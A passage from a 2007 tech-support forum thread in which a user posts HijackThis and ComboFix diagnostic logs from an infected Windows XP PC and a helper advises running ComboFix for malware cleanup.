{CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exeO23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exeO23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exeO23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 14671 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 3, 2007 ID:5945 Share Posted July 3, 2007 Download ComboFix from Here or Here to your Desktop.Double click combofix.exe and follow the prompts.When finished, it shall produce a log for you. Post that log and a HiJackthis log in your next replyNote: Do not mouseclick combofix's window while its running. That may cause it to stall Link to post Share on other sites More sharing options...
John Posted July 4, 2007 Author ID:5964 Share Posted July 4, 2007 I have multiple user accounts onmy PC. do I need to run combofix.exe for each account?Here is the combofix log and an updated Highjackthis log for my user:"Dad" - 2007-07-03 21:13:31 - ComboFix 07-07-03.9 - Service Pack 2 ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))C:\DOCUME~1\ALLUSE~1\APPLIC~1.\TEMPC:\Program Files\screensavers.comC:\Program Files\screensavers.com\Installer\bin\siuninst.exeC:\Program Files\screensavers.com\Installer\temp\blank.gifC:\Program Files\screensavers.com\Installer\temp\dm163.tmp.exeC:\Program Files\screensavers.com\Installer\temp\dm25E.tmpC:\Program Files\screensavers.com\Installer\temp\dm45.tmp.exeC:\Program Files\screensavers.com\Installer\temp\dm47.tmp.exeC:\Program Files\screensavers.com\Installer\temp\dmC7.tmp.exeC:\Program Files\screensavers.com\Installer\temp\stubinstaller.iniC:\Program Files\screensavers.com\Installer\temp\The_Weather_Channel_Application.exeC:\Program Files\screensavers.com\Wallpaper\Hoodwinked.jpgC:\Program Files\screensavers.com\Wallpaper\Madagascar - Penguins.jpgC:\Program Files\screensavers.com\Wallpaper\Napoleon Dynamite.jpgC:\Program Files\screensavers.com\Wallpaper\swpstart.exeC:\Program Files\screensavers.com\Wallpaper\The SpongeBob SquarePants Movie.jpgC:\WINDOWS\DOWNLO~1.\QuarantineC:\WINDOWS\hostsC:\WINDOWS\system32\lgooiwovhp.datC:\WINDOWS\system32\lgooiwovhp.exeC:\WINDOWS\system32\lgooiwovhp_nav.datC:\WINDOWS\system32\lgooiwovhp_navps.datC:\WINDOWS\system32\nvs2.inf((((((((((((((((((((((((( Files Created from 2007-06-04 to 2007-07-04 )))))))))))))))))))))))))))))))2007-07-03 21:10 51,200 --a------ C:\WINDOWS\nircmd.exe2007-07-01 21:35 <DIR> d-------- C:\WINDOWS\SYSTEM32\ActiveScan2007-06-29 16:22 3,790 --a------ C:\WINDOWS\SYSTEM32\tmp.reg2007-06-28 23:30 <DIR> d-------- C:\WINDOWS\SxsCaPendDel2007-06-27 20:17 <DIR> d-------- C:\Program Files\RogueRemover2007-06-25 20:42 94,208 --a------ C:\WINDOWS\SYSTEM32\qdcsinet.dll2007-06-25 20:42 86,016 --a------ C:\WINDOWS\SYSTEM32\apitrap.dll2007-06-25 20:42 182,784 --a------ C:\WINDOWS\SYSTEM32\ddao35.dll2007-06-25 20:42 13,792 --a------ C:\WINDOWS\SYSTEM32\DRIVERS\qdfsdrv.sys2007-06-25 20:41 <DIR> d-------- C:\Program Files\Norton CleanSweep2007-06-25 19:22 76,377,688 --a------ C:\SYM_REGISTRY_BACKUP.reg2007-06-24 13:36 24,064 --a------ C:\WINDOWS\SYSTEM32\msxml3a.dll(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))2007-07-02 02:37:43 -------- d-----w C:\Program Files\Norton AntiVirus2007-07-02 02:31:56 -------- d-----w C:\Program Files\Messenger2007-07-02 02:24:52 -------- d-----w C:\Program Files\iTunes2007-07-02 02:23:34 -------- d-----w C:\Program Files\Google2007-07-02 02:22:09 -------- d-----w C:\Program Files\Digital Line Detect2007-07-02 02:22:01 -------- d-----w C:\Program Files\DellSupport2007-07-02 02:21:13 -------- d-----w C:\Program Files\Common Files\Symantec Shared2007-07-02 02:20:59 -------- d-----w C:\Program Files\Common Files\Scanner2007-06-29 03:26:41 -------- d-----w C:\Program Files\ItsDeductible20052007-06-26 11:45:34 -------- d-----w C:\Program Files\Pure Networks2007-06-25 01:04:53 1,100 ----a-w C:\WINDOWS\system32\d3d8caps.dat2007-06-25 00:19:41 -------- d--h--w C:\Program Files\InstallShield Installation Information2007-06-23 23:36:47 -------- d-----w C:\Program Files\Monkey Byte2007-06-01 22:18:37 -------- d-----w C:\Program Files\LimeWire2007-05-16 15:12:02 683,520 ----a-w C:\WINDOWS\system32\inetcomm.dll2007-05-16 03:22:27 -------- d-----w C:\Program Files\Microsoft CAPICOM 2.1.0.22007-05-10 19:42:06 286,720 ------w C:\WINDOWS\Setup1.exe2007-05-10 19:42:05 73,216 ----a-w C:\WINDOWS\ST6UNST.EXE2007-05-10 19:31:31 171,520 ----a-w C:\WINDOWS\system32\cncs32.dll2007-04-25 14:21:15 144,896 ----a-w C:\WINDOWS\system32\schannel.dll2007-04-24 12:45:56 209,920 ----a-w C:\WINDOWS\iun3401.exe2007-04-18 16:12:23 2,854,400 ----a-w C:\WINDOWS\system32\msi.dll2007-04-17 02:47:36 33,624 ----a-w C:\WINDOWS\system32\wups.dll2007-04-17 02:45:54 1,710,936 ----a-w C:\WINDOWS\system32\wuaueng.dll2007-04-17 02:45:48 549,720 ----a-w C:\WINDOWS\system32\wuapi.dll2007-04-17 02:45:42 325,976 ----a-w C:\WINDOWS\system32\wucltui.dll2007-04-17 02:45:36 203,096 ----a-w C:\WINDOWS\system32\wuweb.dll2007-04-17 02:45:28 92,504 ----a-w C:\WINDOWS\system32\cdm.dll2007-04-17 02:45:20 53,080 ----a-w C:\WINDOWS\system32\wuauclt.exe2007-04-17 02:45:20 43,352 ----a-w C:\WINDOWS\system32\wups2.dll2007-04-17 02:44:20 271,224 ----a-w C:\WINDOWS\system32\mucltui.dll2007-04-17 02:44:18 208,248 ----a-w C:\WINDOWS\system32\muweb.dll1998-04-02 20:51:12 77,312 --sha-r C:\WINDOWS\ic.exe1998-04-02 20:55:56 80,384 --sha-r C:\WINDOWS\icfire.exe1997-07-23 15:03:40 11,338 --sha-r C:\WINDOWS\ts.dll((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))*Note* empty entries & legit default entries are not shown [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}]2005-11-22 13:46 399352 --a------ C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]2006-12-18 05:16 59032 --a------ C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]2007-03-14 03:43 501400 --a------ C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]2007-01-20 00:55 2403392 -ra------ c:\program files\google\googletoolbar3.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}]2007-05-29 15:06 325048 --a------ C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{BDF3E430-B101-42AD-A544-FADC6B084872}]2005-10-19 13:54 218736 --a------ C:\Program Files\Norton AntiVirus\NavShExt.dll[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{FDD3B846-8D59-4ffb-8758-209B6AD74ACC}]2001-07-25 12:00 143420 --a------ C:\Program Files\Microsoft Money\System\mnyviewer.dll[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"BCMSMMSG"="BCMSMMSG.exe" [2003-08-29 04:59 C:\WINDOWS\BCMSMMSG.exe]"MoneyStartUp10.0"="C:\Program Files\Microsoft Money\System\Activation.exe" [2001-07-25 12:00]"AdaptecDirectCD"="C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe" [2002-04-10 18:44]"AOLDialer"="C:\Program Files\Common Files\AOL\ACS\AOLDial.exe" [2005-04-18 14:38]"AOL Spyware Protection"="C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe" [2005-04-11 10:36]"ccApp"="C:\Program Files\Common Files\Symantec Shared\ccApp.exe" [2007-01-09 18:32]"Symantec NetDriver Monitor"="C:\PROGRA~1\SYMNET~1\SNDMon.exe" [2007-04-14 20:19]"HostManager"="C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exe" [2006-03-08 14:38]"IPHSend"="C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exe" [2006-03-27 11:57]"OM_Monitor"="C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exe" [2005-11-29 19:19]"Google Desktop Search"="C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" [2006-10-21 17:51]"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" [2006-10-30 10:36]"Adobe Photo Downloader"="C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe" [2005-06-07 00:46]"cctray"="C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe" [2007-06-14 13:52]"RegistryMechanic"="" []"AVG7_CC"="C:\PROGRA~1\Grisoft\AVG7\avgcc.exe" [2007-06-28 23:11]"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2003-10-06 15:16]"lgooiwovhp"="c:\windows\system32\lgooiwovhp.exe" [][HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"NvMediaCenter"="C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit" []"DellSupport"="C:\Program Files\DellSupport\DSAgnt.exe" [2007-03-15 11:09]"OM_Monitor"="C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exe" [2005-11-29 19:19]"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:56]"MSMSGS"="C:\Program Files\Messenger\msmsgs.exe" [2004-10-13 12:24]"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-05-29 15:06][HKEY_USERS\.default\software\microsoft\windows\currentversion\runonce]"RunNarrator"=Narrator.exe[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]"appinit_dlls"=C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON.EXE]C:\WINDOWS\system32\ctfmon.exe[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]"C:\Program Files\Messenger\msmsgs.exe" /background[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NvCplDaemon]RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\nwiz]nwiz.exe /install[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]"C:\Program Files\QuickTime\qttask.exe" -atboottime[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]"C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\swg]C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\updateMgr]"C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1*Newly Created Service* - ATWPKT2Contents of the 'Scheduled Tasks' folder2007-04-30 23:18:00 C:\WINDOWS\tasks\CAAntiSpywareScan_Daily as Dad at 7 18 PM.job2007-06-02 00:06:54 C:\WINDOWS\tasks\Norton AntiVirus - Scan my computer - Dad.job**************************************************************************catchme 0.3.914 W2K/XP/Vista - rootkit detector by Gmer, http://www.gmer.netRootkit scan 2007-07-03 21:23:22Windows 5.1.2600 Service Pack 2 NTFSscanning hidden processes ...scanning hidden autostart entries ...scanning hidden files ...**************************************************************************Completion time: 2007-07-03 21:24:56C:\ComboFix-quarantined-files.txt ... 2007-07-03 21:24 --- E O F ---Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 9:30:24 PM, on 7/3/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\PROGRA~1\Grisoft\AVG7\avgamsvr.exeC:\PROGRA~1\Grisoft\AVG7\avgupsvc.exeC:\PROGRA~1\Grisoft\AVG7\avgemc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\WINDOWS\System32\cisvc.exeC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\wanmpsvc.exeC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exeC:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\PROGRA~1\Grisoft\AVG7\avgcc.exeC:\Program Files\iPod\bin\iPodService.exeC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\Program Files\Messenger\msmsgs.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Digital Line Detect\DLG.exeC:\Program Files\Norton AntiVirus\navapsvc.exeC:\WINDOWS\explorer.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankO1 - Hosts: 66.38.215.115 kazza.comO1 - Hosts: 66.38.215.115 www.kazza.comO1 - Hosts: 66.38.215.115 kaza.comO1 - Hosts: 66.38.215.115 www.kaza.comO1 - Hosts: 66.38.215.115 kaaza.comO1 - Hosts: 66.38.215.115 www.kaaza.comO1 - Hosts: 66.38.215.115 kahza.comO1 - Hosts: 66.38.215.115 www.kahza.comO1 - Hosts: 66.38.215.115 edonkey.comO1 - Hosts: 66.38.215.115 www.edonkey.comO1 - Hosts: 66.38.215.115 emule.comO1 - Hosts: 66.38.215.115 www.emule.comO1 - Hosts: 66.38.215.115 suprnova.comO1 - Hosts: 66.38.215.115 www.suprnova.comO1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUPO4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exeO4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /backgroundO4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeO4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exeO4 - Global Startup: America Online Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exeO4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - 